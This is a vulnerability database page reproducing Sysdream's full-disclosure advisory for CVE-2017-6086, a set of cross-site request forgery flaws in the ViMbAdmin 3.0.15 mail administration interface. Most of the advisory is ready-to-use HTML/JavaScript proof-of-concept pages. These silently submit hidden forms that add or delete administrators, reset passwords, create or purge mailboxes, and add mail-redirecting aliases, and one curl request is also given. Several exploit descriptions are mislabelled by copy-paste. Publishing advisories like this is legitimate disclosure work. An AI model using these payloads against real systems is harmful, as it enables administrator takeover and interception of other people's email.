Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities

🗓️ 05 May 2017 00:00:00Reported by SysdreamType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 52 Views

ViMbAdmin 3.0.15 - Multiple CSRF vulnerabilities, high ris

Related
Code
ReporterTitlePublishedViews
Family
0day.today		ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerability
5 May 201700:00
zdt
CNVD		Open Source Solutions ViMbAdmin Cross-Site Request Forgery Vulnerability
11 May 201700:00
cnvd
CVE		CVE-2017-6086
27 Jun 201720:00
cve
Cvelist		CVE-2017-6086
27 Jun 201720:00
cvelist
EUVD		EUVD-2022-5229
3 Oct 202520:07
euvd
exploitpack		ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities
5 May 201700:00
exploitpack
Github Security Blog		ViMbAdmin CSRF Vulnerabilities
17 May 202202:12
github
NVD		CVE-2017-6086
27 Jun 201720:29
nvd
OpenVAS		ViMbAdmin Multiple Vulnerabilities
14 Jun 201700:00
openvas
OSV		GHSA-RRMF-FPMM-JPWR ViMbAdmin CSRF Vulnerabilities
17 May 202202:12
osv
Rows per page
# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

## Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.

## Details

**CVE ID**: CVE-2017-6086

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-352

**CVSS Base Score**: 8.8

**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of concept

### Add administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>

```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Remove administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Change administrator password

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Add mailbox address

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Purge mailbox

#### Exploit

The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Archive mailbox

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.

### Add alias address

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
curl 'http://<ip>/alias/add/did/<domain id>'  --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

### Remove alias address

#### Exploit

The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable Code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

## Affected version

* tested on version 3.0.15

## Timeline (dd/mm/yyyy)

* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.


## Credits

* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 May 2017 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.8
CVSS 38.8
EPSS0.00168
vimbadmincross-site request forgeryvulnerabilitiesopen sourcegnu/gplmail servervirtual domainsmailboxesaliasesweb interfaceremote access vectorcwe-352cvss base score 8.8proof of concept
52